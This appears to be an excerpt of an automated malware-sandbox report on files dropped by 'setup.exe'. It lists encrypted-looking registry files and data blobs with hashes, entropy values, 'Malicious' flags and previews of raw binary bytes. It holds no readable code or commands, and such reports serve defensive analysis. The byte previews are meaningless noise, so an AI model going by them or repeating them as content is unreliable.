              Size (bytes):8526
              Entropy (8bit):7.977974987629936
              Encrypted:false
              SSDEEP:192:B5P9AzwW1m+yDsXn2y3GagWGYz9CP1Tp/6gSs3:X9/7DwB3eYz9CP15D3
              MD5:42C5FB61A48B72449BC56843DEEA42CD
              SHA1:6F000A4DF0FDBDCA3A585789A175E8CB8744241F
              SHA-256:0CDFDC579562C320DCC586E8F06C6FDBA7058DDDFA1DDA5B8E9B12F89FE960F0
              SHA-512:8F0CC14D16A1E4813C6B531E1EE0C854EDC663193D5AF40C0DBE70440BF5D58D391497C7F0A361F46E3C0932C736A9A9F813F23E9112EBDEF5F97CF5FD2D22AD
              Malicious:false
              Preview:regf.. ....N......p.Zf.6U.M..8H.y...M...;+G.(.5M.q...2.iS....d....j.3;...G. >.MS.$Owh...H....v..<..:.Bb....N....%..s..d#Q..._..T.$}L?.Kp..M.=..'.GWo....l...?X]......2qNEdx.Q...*.....M...z.... \,.Z.CK.a.j.....tVN/.....e.6..3...<...\?]A./.z.AKp.N]..).kHi@.T/w...p u.v7s."..}.y..................G.9:..f......tBf........u..VW.U.. D..."vr..< ]$Ts...I.(b-.>......._..t.f.o.=.z..G..]....A..i+..b2H.cF...ey..{[MV...........yN.#4..._.[Ho...Hws....>./.z......9..ln.5a..j/.....b+....[..~..p...W/.&C4.....+.Ga......`...N.R.....Yj=I5.9......i.C...SO..&...&9c..,..?E...u.w.WOt(....P.D..........v.j..,0..%..o;/.....vT.dT.A....a..NY...=..|..r.g.e........R ..\.F..J.S.O................d$...ep....'q.Fk_..j.\.6...3.?.....-$...).....3r...t|"..yq....r}.>.z.@...(......._.....?.K...jz.s..Q...V.*Q...4H.IL.l...Y..n.......kF....Z.]..Z!z...g..=<... i._o.\....<.Ab.[.#..^.]....s...j..\.)..k)m...d]..&3.\.+p....sR.$v$sqk..C.... ....:o..q.D.=a..z..n.]. .HI.J...I.@.Z...I.w....o..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9785638877539125
              Encrypted:false
              SSDEEP:192:bvlU7uoty3mEeBNko5/OUDCK0S1sE4v4vsICN/n4d6OFA7p/isdQfussb4et:bvlUSotwm3Bmo5/OUDB/48snN/n4oOFS
              MD5:7E5CCF2EA5CC81236E4415EEAB22FCBD
              SHA1:592BBECA32BA8E7B923B42A740181A6728E6CBDD
              SHA-256:AB779A1554502081E8991B6D83A1BF21682A6EC4FCD73B2CC0D75CEC8A6A1B11
              SHA-512:CF4685FBF26C55BD6111929D0552484E43ECFCD15C5BB9E3E0A0B0E41C5F02EFD097D2ABBBE339B0E65A4B8AADA6C3FA132C86A61CAC0F2A70701AA2644AF7F8
              Malicious:false
              Preview:regf....Y...d..7cH.......4~..K.c.......{..:..<...T........+>*.....`.B.i.$.......7..l?....B..$...r....2..o."..)...t...9....9'..8.X._>........cn....UsC-...2/.....g{;....&.o...|..2.JD\F..g...().J..4.VZ3.Q.t.4u...{w.D..1..[.%..I...-.*.mN_.^..........,Z....a..!.?..C.v....^..n....G..1..,..$D..FBv...(.#Y....F|..........].-.=.h..Y...z[.v.....p..x..Xj..........m.|..m.Fd...}.)..1.my.y...`...~.e(.....D(X0?Zr.*(.v.8%......1.7..)...W...>.31c.:v."...Ob.apYStX.j..M.KC@......L.iI......*$. .9......S..6X.........v..].N..x.,(.7("Fg9.{"&k.+.h.,.+..Q.)*iw.[..x @..U*!\........w+.............z...L..&3..&($s...!\....q(..j..J..a..m..N0........R.3d.h.r...%J.mb..N.u)..{.;-..R#..j..t.D.Y...gI..%.X.9?....IR.o.,..\1-.8......$...Z...sH.....(..z..:....\........X..sI..(t..&..c,.>........U..d....E..1A...:G.Z*<e....%}"o._&..=W\WuJ.{e9.`D..|ht#^.....s.3.d.~.[.h..j.......1......p..`...M....r...J..9.n@._..^.Q...[..8.O7u..*..#..|:....aXqS..m./.O...z.....@3'......q.|.....n.|`...i...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.978791990174601
              Encrypted:false
              SSDEEP:192:M+DbInCJENSnuje4ngKCDDtyNUan3fbks2tazXq:7DbICJENSnuje4g3Dtja3fbNN2
              MD5:5B15622A7C70CD34F3F29DCA0188006C
              SHA1:C070199D72BF59965FCDF46B50A97DA7C21E90CF
              SHA-256:DAD548F8ED4A7F35754C99A84F0B37F84806BD2FAF4213F06D66017BC4FDE52A
              SHA-512:78D53133EB338A81B540C5C4019FBE4F326316A6B871B523815872792EAD445FE1522324CFE18023194B9BBD6DED92CCE30CB263C4DA15DA148EBA74349BB87B
              Malicious:false
              Preview:regf.E."5<J...D.i.jY.S}"..m.:u..tU~.a........ws...V....).^.^;;4.......~."F....`S.V..JdL.R.m._.@.?...a..G.y.%.?m.G.Z..=..n/.ztm:mj......ymo..!^...VG....`...k..>6Z'.......4.4.<..6..UvxY.r...\R.B.Q..#yV..o.v..Gl..R...u..b.3PC...:.....j.~s.....#..6....pI..#Q..@.fC.\.O.V...R^..+...,.k.6....~...7...yGdl.(.......8p..rO.].8......F.T.W..lw....L*xF'.-m.U-f...&{......oca.T.....O...~B.s.....#FSO.....S...K...}.9Rw...c:.@,.K...m(..'.W.(..._..]'..4..qo8.... 7..cX.|t]C.'...[.1..yJuQ../t.x..!...xO..n.M.b.q.7.........c...rAB.r...!z.q.eN.K.....s.............q).%`.0.>.!.-.I..vo...9..z......i.P..1K"ko...rV*.O...'....m..O.ez.\........0..:..4/w.#.......Z..X.3.c.t.......tb..tt...h`.~e..z),t.;#w.%n.D7....{gD.......Z...^.V.zK.<..z...k..tU6.....;....c.Tv.. %<-......[....... y.^=..v...dTh..>Bz..(h....R.r%.G....1..C..b..j.j.%....Z..K.o..c.D..i...s0.c...m..p.>....X.~.J`...>F..H..l..._>Y.S...e&.\...........w>s#...C.j.[..F....s.'.e......y.YI.....i(...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.979867929015553
              Encrypted:false
              SSDEEP:192:646RuUcCY2Pf27/7mQKoeWmHAqyLidPgWM7Xm:aRdzY2W7Th8Z1RMTm
              MD5:018C9C7CAC1A968C58825D6E6075B6AF
              SHA1:B75E9A619AEE592FBD509B310E3CDCE48B86284F
              SHA-256:9107121CAF8F91E36A9E2A4C5357B8EE60DD625F8926BE80563938CEC23AE904
              SHA-512:FC7EBCAA55489C699C43FE5578A1FEEE17A79B0883B4607C6D27660790D9966EB2D856D7C8E46ABB1CBBBA43DA0DE113E3E036138767439671C5EA34BFA008E1
              Malicious:false
              Preview:regf.i........i$x.Z......f..'{.2.....I......"..}..v...t.8...UZ.r$....vG.cp.... /C..Z;..U.A.B...s.|.-I.'1r..7..Dk...'.Z........\..<.F....\AUl..........1.......nO..M..W.4.Yoz.....l......`.3s.Fl.?if.....qmO;u.@........F?.......Y6.".@P.&.......=c....Er.N.Vs.............yb'M!..q{..=./=.c."4.WCM...$l...z.q..,=n.y.ym.e.65\.R)......L=/.Y.....Z...Qne..!...5.I9...q.........v...]zL.n..I(...#%....'_oA.zh..K4..$..*S...K.....*.r...C.`.......3."Z.G..*....6qD..dyh.L...s;..?.............X&!..(.-.J.W.C.......Jd....g.b.C......4.....k.x..|4....}(. L.5..Tp.X.....T..t.4.i.O..9.~...fO.J...@.......P.s.{yWs.{.H..'...q..E..A....k.t.c[..^>AV\H..7<...mD.I....\z7....=4.x.Q`...Fq.NQ@./cXT.1..../.}.yI?)...C.........5.h.O+~.4..}...{px....*....R...8..^Mi...tq.N....M..P.X..(O....r...w.$. .!Iz...=....`|..6(....sm........w.h...'5...F...J....e.d...0:|...R..(.f.....JR&.6.Md.R...[..f..IW....L.6(*:\....G......t.ME.'...e..2..@_..L.A.N..i.k..NL.!...........M.....]..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.976413303126992
              Encrypted:false
              SSDEEP:192:2NVnGbKZvCIlAjNkk1jwTSd8RQbLWQp8hQ88Hrcw03OEC:QnG0CIOjNP1kTLQ3W9qfrw5C
              MD5:153AA7F9029DC7082A104D73688A042F
              SHA1:192369399A632C30210596D4492917FBF0386818
              SHA-256:4DC15350A25E00929679CDD74B2FD8B26BC7AC1E8A4792618BA3E975F7105CAC
              SHA-512:A08D80ABA7CD20AFE6C663062149056121FC84A613623C5C80E6CE162F1D326EB4CC51CD1FB7070BB7C83E2074922A6F43D38CD6088D92D876942C4A9B8B5BF7
              Malicious:false
              Preview:regf.Y.br(;2r...q..._)..h.h^Ol....0P",.%%..p.~Yc..y.6.\.vcIL..A..^.Go.Z.X.....)-Kj.x..'.u..2...U.MP.S..Mk.*..a.S...{.......D.6 [6^..>.#..U..m..h..s.....Y.fh.x+.%....ZV}{0.[.A{.G2M.;.Z.@......p\.../.U.j....D..8R...=.....'..2=Ny\..;?.p..(.-..GX......W....^..G..n%...L.5s...r.xY.1q.i&.d;.......F..R.Kn....c.tY.S.:y.N..A.9....J.$,.|.5.v.c.M..Sr8...+.f...#S..$....|(Ow..*W.p...X..j.v..t."..<...]......%.:0'q...XHSHh....ik.....M...&..:.VL..P...|...W&.ub....4..16e=66>..k.6.<h...^S...E.1.........[\`...1e...*.....Q...4a......HU ~.....C.h....?......U.K.....)..W..&.-..c..zc.../.U.w.Z. ........T|./RSz.J.........~.39-....... H...V.l..6.#..h%.j..2....2Yp.......Fj...-.......%.o.H.UHh|r.bP.......Z./T.U.....g...CV.@.......PGz.....r.._.&.$.z.+.[..K.%6...>..)I..s..;...5......G.ECpy....|E..........\.....n.RR...6pq.&.8.^..)z$.......[.C|..<....[%.^.`.!Z.BKo.Z..11.7U.f.>j.PE{].......x.ZN.NM.....].{....$....G0.HPS...w.?.......TT....q.P.Q>.=.J_..\t.FqlL.K.C..s.7yym{.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):49454
              Entropy (8bit):7.996817972800084
              Encrypted:true
              SSDEEP:1536:7eqjPok0HaaPjHTRIVf1wKi7QBfKD/7zc:7Po7R7HiZmGCD/7zc
              MD5:AC06AF45FAC6593A085F3276C122FE65
              SHA1:C460707A0501EA592B7C9766BD46D30D06A1E65B
              SHA-256:13160FFF75F82B5893644F12131D7795FD37D8409A1C013A31097A5D2F66E605
              SHA-512:129AB665ED35807E3192330D7ED3CA816C185498745528710953068C7B7FB104191EC3FB9CDC8C9256D2273688124865D5544E34C28363EB2952B70FAA4C5C99
              Malicious:true
              Preview:......J.k.7b<....^.Ve.K...5q.,...^|....i.M..%.=.ZN..tm...`..Y.......z.E<..\..S.....j@.#.d....gF.U...y0v|Y.U...0..,Q..B......V..H.....DfE.z8.. .6>r.vG@~..5....E.!^D..7..Bj..^..$.~.%.Q.~C.@.......g5.1.a.....c...US.R.u;:i.:...3..7...}]..8^......n.v...P.% OL..FPc\.o...[p.X....a~S.1.=t...:...c...%.t.*...`.....8n6../j....I......\...&....m.t.^e...+...L....U.`........?..e8..0`.e..j.......@..n.........E..x<..S......D.:&.H[y....y.<C%..n........(.O..%..m....n.g..!z.>.g?.....V....}iY,6Z".l.Ml.H.-..9/&..4.HV...e...p..R*J.>.....F.#"~0........[.....c.gc....#...ux..UQ..%.=I...fHD...`..m..J..S.J.sq.c...e.Z=...^.9y...0....9s..7.D...j+...bTP..v.N9.RK.f.)&.Z...y.R.?.|.C.,..c.....@...]PJ...D.jN..MN... r.D....[.#W.GO.............Y.I=R.M#........4.k^!=.)....].6B....Kp..H.97.. ...[m&f.z.X...*..*&5.n...U>jG...'Ct..f....{ @v.x.;..!.q49..+1....UQ.'z....z.I....S...#..&.U....m..o..{..9M.............S.EU..5h.q....d.Z...a......#R.1..{..Qa..6..}..2.._4kar9..m....\.3..ruI.Z....X..<.HA.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):347
              Entropy (8bit):7.195708712897737
              Encrypted:false
              SSDEEP:6:p0nYF8YNlZzpInJ4ej1dqTFiMD6Gib4fOeVdHy/OVTf+VxWsXkNR2cii96Z:p0GpbWpjmXBlZHpBfqQsMR2cii9a
              MD5:B4BF6DBF21868F588B0FAE13414D708D
              SHA1:1498A39EAD22FE1F62C964CDBBD1AA3B5907FBF7
              SHA-256:A7EB9B09EA0A9BB5F58C8A9FBF08E906659D6658208CE6BCA1C73A56A86D126E
              SHA-512:2DD209D3F571A5DE79E7F3A99E01630833DF33C9B03BC40FA6A0343E252ACEC9B8D9AF7C5CCA570234DE30BB1E785E2FFDC9ABABD718979241C5F6D1CDC2F6A6
              Malicious:false
              Preview:<root.....z.....8*.ErhHa.k.U...r....(.........hNL........|..Q%YwAUky......j.c.Y<..v....p.*...H....+....Q2....D.|<..K.|5m...".....8..T.u+..S.9:P..,....D..c...6...u0z.|p.k<..n.-..P...w.yT.D/...:.....C..vxW8i....y*b.g..hi.jt1..},....i.Q.......E..Y.WZ.e....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1573198
              Entropy (8bit):1.386044846119011
              Encrypted:false
              SSDEEP:3072:XD8Z7mN466VFGGVGt4RjEHqb00dd7PSA8KBuYCXIdOFNzKwva8w+Afa8w+AJ:jN4RPVGWlEHijTt8rrFVKjih
              MD5:15AF49F453BD9E08164049D2311A4E08
              SHA1:0B2042508947716C90CA75FC92040FBD3A8341A4
              SHA-256:626266F68A0703040B7F79B9B838FF9F9881B2879FD5534BC5E76837BDAB3E16
              SHA-512:7ACCFCC6850780AF6EDB45B5B52FC70480F3EE8FBE1C81AD954F9E86BC860FF08799D5DBD2EF3BC46DF650F88036910398D0128505BC9A541061855FE527F934
              Malicious:false
              Preview:wvi{.c.3..4..,1.a..h.p......M.p........XV0...#/xv..\X0..4...vC&-......+[.k....6....0.`..b.-e.g=f..qA.......?^Q.l..A!(.X..O;...L....R.6...0,.ilhf`>..._....L.0D)Vc...g..^.UH.E..\.N...(jEdo8.+..}3.BM.`'K..#....MQ...?0....e.As>..PUn.+7..6.kX.D..N'l...~..<.....AN.]0&......?6.Z.^..q...f&.........L.....3..Y..v.T.C..&;....PM."%.(...[.l...h:Zq.N.QHCk..#X.V.}..5.%.$.aJ'Ji?....>R$..69..:..qGu....Y.....|2......;X.g....('..2..5.;{r...iS_.=.g...z*....w...{..LS....>...4NK...5.Ep.J?.0..!$....c2u....e^.{6$.]......S.J...H.....N....u%..].v..U.t..^z.Pi..T.3=.c+..\.0...y >9...........]L.U..my.b.N6+..jH..p.(..3...h...'...nVA.(..U.!..........R*-.-...U...)pW..x.8..p.%.z./.j....Qc.z.Q..v4.t....:>+....Zl..$wu.......k.(..]I....zb.[.....8....|..L...H..p.UL;..u..e8....u..]g.rV......!.....E..0B..IcJ2r.;....0.....v..<...R.<.V..._6....J.;........S?)..2.b.......j..........i#.gn...w...,kp.$....4P7B(.o....t.m...5K.*S..Eo;.n.l.>....T..Z.......r&.....v.4.C..1...c.z..LI!..D.G.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):16718
              Entropy (8bit):7.9888448617061965
              Encrypted:false
              SSDEEP:384:S+tiovgTnCUkmAqV2Fu/o422Yy77Kpjos:S2gDCUk56wf6XKZ
              MD5:537367A7E022A052F37D8C6AD66A9E3F
              SHA1:14FB8200A3995C9C21C2D258C23A21086C07421B
              SHA-256:0EC091301C2127ABFAE400D5659457830F7F4539A696DBA7AA703608B2550B69
              SHA-512:6F74550D17E1E9FAC270FC75F25D0284EF22C3B20FC8BEF573B8CC25991376E000C25EE713CE66C2EE36F88921FED7F6252286A1A5D7E78010F6CB4D4401C681
              Malicious:false
              Preview:.zG3...Sp.C.c.....4|r....wR.........pL.1.:.b.9...&3.H...RT.?....jXc.3..1...1...).S0.xy.`Q..G.=qZ.~.7\.....(<....Hx\..%Y/.!].K.../....v.Kj...b:.b.wy.0z.....7.T..L.[....|.r.......t.c...PI~_...u."...h.....9.+.:..a.yB.xj.Q\L.................b[..kU.......L..=.%67R5.b$.H..."....L`.+....a.....t....._j..Y.#.).a..N....J`.UO0.r...Q.+E#....Pd[...[?'y.....}..)..y.s..V..d.9..^.....2l. ...3.>. ..!+..x...oB...H...ak[A..%...j.........i./.........(...f.v8^..*.^a'....Xx.t....]J..%W.eG...V./..yp.~.T\=...H.....o.{u.5xW.d...a..........q..fpy...!..._..}0.......cM.Ns-I.X.*.k..&.n.dA.).....#.s..:C..+..zO....5.u.@...../)...#{...T....=....WX.siV_.%+.^`.ZV!....tA.u.d.!Pp..;.$a]..Y[.&a.al...F.....B..Gl...^X..1... Rqn..pl$..-.@.GJ..N.mX....wZ...%..].T.....l.....,.....$...t.....r.V.}.r.S....L$.....L.k(.|...w4.i.........`.r....u.C..cJ...O..)....(1.U..>#..Y.....3-..a...b..(..........;...*...g(,..............9....z.....$,....[:;.UH.....xk.. .s....b#..u.....i.........V
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9754268521470575
              Encrypted:false
              SSDEEP:192:S9kGHjfY0m6Uk9q4TGMh0W1EAfhwbCivLssTnugLP:SmGHLYSn9qKxh/fhw+ivLsiumP
              MD5:460F5834D151975073F0EF5261D0925C
              SHA1:010C2FDA01346B9F461BCF7829BBA90F116331C2
              SHA-256:164D36811242769E249933C17C344228901516B44C4399D790F2146142E81685
              SHA-512:B03BD6D61F47603629EDEE591DE53294633907AD6A9716CB0A7C8DF8F5861A16368A45A493994950BF5B63CA98D1EA3906F9E1CF70BA0F1669226CE24A17B33B
              Malicious:false
              Preview:regf.........k.h..'...B....9.{$(yv..70....pYS: .v].....T...D..9.b.[.... ..'./b.E'.C.|..K.'T.l.4.cg....r..&...8.&....V......|c..N..Cx..n.?.d..z......c...:s..3U..M1.IQgbP.#..>.c=........X.............p......8...!=...y.]`..PY.0..}.B.,.p... ;..<..$..].....[........L..&8U.....S...,..Bp.?..h..d...."......v.f..Z.6S.....MB...V...1.%.....jnx...$v...]m.9.1E$L..+)..-...%....LH+..(6..............[....A.....;,,...^..G...."..M].dD.+5..[.l.Z.8..y. .......1...`#......X6.>....HT@.N.(..J..../......f.)."..{j.>....+..u../Q.....q.i7.-.C........^.Q..oP.9F.....uqgV...M..KC..2..M|.H....T.f./..,.7 .0(J>...%5.j.tx/4......[P.....l.3....tY........"...7S...,o.A...f.=.u.W..(o..E<(........$...'..]&."..F.q%... .i?..D....Z.or.mQ..YN/x.........r.r(.5:.C.sp"p9.IN.......Y2.o.|.#..F..~n...1.f..0@...,)}.k...t8E..nE......].......9..|,......v..T.........`........%{i..m."....b,M..E.....n........t.|.D@.1..8.V.:..p7I...Gb.HL..a...I..I..C......Z.D....o..P..D.:.x~h...<1_
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977155904897518
              Encrypted:false
              SSDEEP:192:/FtO45WE2jXsYRnsA2vwPLfUkX3mgBTJYDjyKWc3KWGsPb:/jO45WXsS2uLfdHjBm/9Kx8b
              MD5:5A7AF4A46F82C98DBA82A06B83245EC0
              SHA1:EA839FD9A74D5A7F6CF402A71862E83C61DD6D6A
              SHA-256:5DC3061A1B411E2656C7353B993050F9018C834AD8D5B176E6EB5E7F2FC20B8A
              SHA-512:5606FC7A274DFEFB3142EA0C67C50ECB6C167224B60ABE07F1462425E242F450D253DDA7D8F0035FCE2BBB08B6B816258D2F8E79B0F1C3079DC2F293C39133CD
              Malicious:false
              Preview:regf....p..9.A.jg.T.J....s.$"..H.M.o...'.L....|.e...........V..(X.#=O%..e..!.8#.......k.x.....SJ......D...z...O...s...v......i.;...}e.,..y&....^..!....O..t-!...g.t.<;`.n&......\..w..p.5..u.q0......[.....}=.=..c/...E...*;..H./2.d.4.eZ...s.[&..d..}.J...-..h.LnU...Y.. ...-.I..G%.,{}6..w....0.. ...3$.....'..o."w.i.......H..Rk0........k.{.w..^..9...?.P..F...&Uef....et.F6..Q.@))...,@g..u.ZW..H}j..A.. E....{.'..7.7y.co...I.j....o.uKua.".<L,.. .sIs9=.7.......g...p.p.).B..u[.T.U...a..I....v.^Z...-..J.^....LLa.:?..Oj./.........<yb.\.*<w..R..9.#..A...G..(...=......\...qF...XV.1...>...e..l.Lj....2.......K....JU.gm.1..}......C[].t/..x..W..8..N{C.....0....X..d../cW.. N..Z7...,n.e..&.`i8./..P...6.M:..^.e..b.D[....F`XW7+Ili..0j.c..>...XK..z..#4..o.M&.L.PF..=..\.KV..F&..."..c.....R.Ky....>...Z`..-....A.G...+[.p..........{..*.z.D..1?.+./.+.ZP.>.%.%@...fM2WO.I.-%.q<=..n>{...x.=......h...~.<..7h|...&..I....Re............Y.f...l.9:.!oG....7&.9.$1.....(...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.980970466366803
              Encrypted:false
              SSDEEP:192:1m/xuivKkzbhxZK8KNVCLLFW/BDAYDgOljBrtU+L3/LHbSSjv:A4iNJOtmfFW/BxDgOll7zL75jv
              MD5:02342D7238CBDC8F4F8E94BF6A51BF1C
              SHA1:E76E6780862F9A8ABDD18CD78ADF14A8CF455397
              SHA-256:C58530BF7EB961D752E88EAF750F6EF3BBD83F579E8CABB3F21BB4A69D090246
              SHA-512:C1780C798D60CF5D1FE5DD589746AEFB47415DE3B19899EDD7352624FF1125891DD949EB31420C03224F4ACE8777EFFC3B9538AC5003417FFA90ADDA766CFC8E
              Malicious:false
              Preview:regf...rV_.....&..0.'9....d...*....^.(.UK.R.....j^n=...9.>q.M..n<....}.1.....H...b....X..@.r .U.m....i.5...c}o.].f.t.....Q.v.D.X....\?X$...I..y[..A..R...p...;(..$%w....Fa.H.s..b.../..t....KO.+c..?..W...A{K..iE...].6........e....q...b|...W.9+G.>k.)..`..g@....O..j.AE.6.X.2.%.....t....~:9S....;G.%ra.A1.....)_.)y.cQ.^....).~.gi=.5P.....2.d.TB.\Y.....{...J.=|.C.F.%@.b....>Wn9...l.D....~.Oo"..S.{....j..cz...`7.1...3.E.k.N...tM.I.d...6...B...|c.t{r..f.r.O.sy....$...C.,.]G.j].6..Um..........S$..C.).-&.e..p..2.3..@.Fa.#$bBN#...Q..17...@...E.3o.b..ti.....$.......".,....){Z..|'.`;\....k..\....."..GN..oT....v.Mj............2.3.u.`0.Y.%M..Tf.j........x.i.^.-.g.T]z..G..z...]z...02...J...4..."....V.4Q.4s)K$w.[..Dy.H.u.E..o.....c|.#....*..H....S..}.m..`RsU|..{..!n... .c.#<W.f.>~B$D..I..w.x..Z.Q..0.......p.....ks..G...#(..~e=EZ@.2u.j4.D=.h...V?.W.Bn.......y.-.5..*E#'.?.. R.#&3[..i..x.u.8y.}H...q..yA.-S.]..l.....t["$....:s..yL...(~..q.P.l.Xd.~..{..V-mV
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.977070720623356
              Encrypted:false
              SSDEEP:96:nakU1ScWykcTyHw0MzzJ2e4xWOn/gdKVqnUk8HhsRy+MYpkfeYj4J8Uujz2NTO4Z:01weyQ7zoe4wKqXRFdYjNHqfBtyVgini
              MD5:8BD922F3B23C9B1071F7D95875FC4369
              SHA1:348E6899506259709F7556C0CB285862428E9ADE
              SHA-256:761F3E955AC2C83A9F6239BE1DCE6C0EB795FA2711391CEB85083FAA6B29B152
              SHA-512:FE921D45BC120886E401AF8FAF84B46FDA5491687528364381038478D624C58E8D922A8FADB43FC5B14983A7F1BEF3407A4C803FDC6D0E4D7872F4D2C21A0AD6
              Malicious:false
              Preview:regf...>.TQ...,.[a.9Q..5h..b...Z......*.J.(@I..Nl|P.............._a..x...~.{.....$q..g+.N..k......F.q..Q...&...q....._F)....O......e...[/M.9n,!..{.=.9..`.Y..2$R.....:?qxW.%...m....o.............*..==.Ri@F.....O@...6.VM.L....!Aw..D..>!.?.r..z....c..e.U../...dm;...4'6......`.H.........*3.r(2.M.:(z2.'..P...D...h.....].[y.jp.Q...N.l.,$..xt.....b8...<.u.DU..VJ........(.."..........<c.......n..u.$.....<!...O2.......^.).......Oth. y&{.........9......;a.&x.+.....r...e.]4.E.[.....nxp.r7.~...XM....7.D....s...[9.er:.....<u..y...L..O..u..C.....J.6.....m....$.>........D..X.V<Si..udjWr..|...l....~o..'L.pX!..%@.#o..`;A...yt...L...u._f..V]>Y........L..tlW/..F..[.....U....rV-.a:%*dB5..i.........].......ZDe|.{...1L&R...F..O."..i=U.#..n........H<...r..c.C........]W.....M^...e.?.....N..v.........k..;.!.H.w^x>O....JD..L.d..l.@<.7.s=.c.d....C.#.....dlp...HuR0....q.b...Sd.s.,...6|..n.5?....P..C~(N.._r.m......M...-3......z.?..cW.+..j.4Nr.]7..(....w...q...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):8526
              Entropy (8bit):7.9762864795610104
              Encrypted:false
              SSDEEP:192:gqnyIzxESBwr+uELYSj0Nf7MQdWa27STUW80cDOCZY8d1:mIzyl2YHpWfmQW8QCZ51
              MD5:FD75FCC02183468BE3B4B7B7DB5BD9F8
              SHA1:3397B409D1F898ADD81A463A7413E83B3B92F341
              SHA-256:A3B000023B840321C79ED02E7756071A9B32CF7501A5523E78A02CD07D80842D
              SHA-512:A993E240D7CF4AFB3D7A25FD8888B918494E04A9FD5C9E80FDEA21A41D11B28D2A140674CA33F7E0D491865B9DFD484A6A64FDDCC1CE325D0785FA0692F517DC
              Malicious:false
              Preview:regf.I..;.Ea.o.gYH..>..d[7C.v...t*..{..8ra...S.re..I..&Ii......rW..t2jY..`......r9r.o..Y..>..F.z[.....$.`N...#.e.!$.0b"Is.!:......lhi....PR....A..d..L...Kz.)..9. U..7.t......-.."...`=.{."..6kQ.@..8....c."'u-T.p..hI_=..WE.%_..|N.\.mm../z.TF...o....Z.._....)m^.k].W...~tR..........%7eZ.#.8=t.....%u.AlFl7x8J.R.._x......#..:..`...)e,...E...-3.k.........(K..!.O....I./...).?.i@NW.;..f.gG.u....a?d.....4.#)...m.*.."=.....IEgwg....d4....*k9...v=4..c81.v.....j.g..*...e....E...m...Kh...BK.f.<..+.Z.d'....t.7.NG....q..c..!c$."...W..l..{11_.R....a.U.....2_....,..|.O[4S.!..U.J].G.6.'......z.B.jxn.f.fJ.c.N.E.K....7..F .U#p.q........{s.C.4.w...e..s;...A.4...P.m.U..d..XCRi../...Ai..`E}.f..@...u[..Lrs..N..I...F.>....A..~..vcp./D.Y..L...&3...OG.....l.L.;W.Q2........5..#....XX}.m*....?...<Z..p"V.'M.n_0....a...?..~."..[~]..............%f.."....8...sY=.4....o.w.;jD.-.|.\.$i..W.F.[6.M....N.^2.....+..h.......L.wn..U.3....q...L.|F.....=D..C...k..%ytl.M@0.a.....6...|
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1573198
              Entropy (8bit):1.3304381563878276
              Encrypted:false
              SSDEEP:3072:SOehq37RZcynXMUyjOfYpEV+45LWZ/N/2qoWTC79W/7smbbe8aJ0a3:SOehcnxyjOQGVuZ/ru79W/7xbG
              MD5:742590FBA8730DC3209CE5A7E0D0AD70
              SHA1:FEBB817E5C06054C2D67085788F2F84DAE615211
              SHA-256:85B3F94CFD09A43C59DB78443DF7F11B2EC93C5D7D8FCFFB92FC1E39225AAD2F
              SHA-512:8BA4F072B052525093E7ED3A6AFB88521BACE2CFFCB9C9AF69CD9BAAC2A26751FFADF97317D9514676DBA55D59AD871C56D6BEF127333A480D631B2BD98253D4
              Malicious:false
              Preview:..`...}....J...y0..s`[...qMd...._....&..bC.+..{0t...'..Y....K.....;...<~..]I.a7...C0.....t)..>!v*.C.#.z.[.d4.[BTIZ$`{G.....3W.j.K&..%.,.YzU......J).,.RC...u.....!.2.Rk.'q.....^}.B..f..KC..O.@........48>.B^.OKS..H..{.h.....k.[....7)....mSm...w%..V\.p.../%W?..Z.....7l...ey.v.o.....D[.......Yk..I<...=.4.UI..(g.8..{.[.U.w....s9.|s...'B.5^..}.`G.`....&......[.^.....P-r{3ap......./][W....u...$..t...o..qu'{..>;.../.T...s.!.M?^../.2.WBO.._..e.h..e...]F{J|....$*...(.B.l..iW....gG..a.i.F.,B@.|..-....!p..r...n..F...$.....]......-.[-C/.2....Pr...._m..U...B.E..xD..+<...i..s.0....#.Z..>}.qR".E.'........)..%.....J...L..B...?...nd..^k(.........&v6..,Z1<#...`...p....h.$.._g.N....T...u.c.......^....}!.6]:b...I'..I..gq...t.;.W].7.o...Q..lv.F..+...."...!.(....*W.Y......9.i.i...Db.#...(.-...W.x..i........j7.....R..7.h....m]......Q...9....5ls.#.2.r......>.y..#ZU.2P.z......Z#..._.+.2......./-=.!...5.... .NYb...*...j.....q....6.5...*Z....q?.w....~.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):16718
              Entropy (8bit):7.986727444292681
              Encrypted:false
              SSDEEP:384:mfd6KTUrW5KtbcmCjpkK1HJ1c3dy2ksrWueNC3nT/VSV/mN:MdBUy5SKkKXG/rj3DVSVeN
              MD5:5B88886FBBCC7D35998D315E4990115F
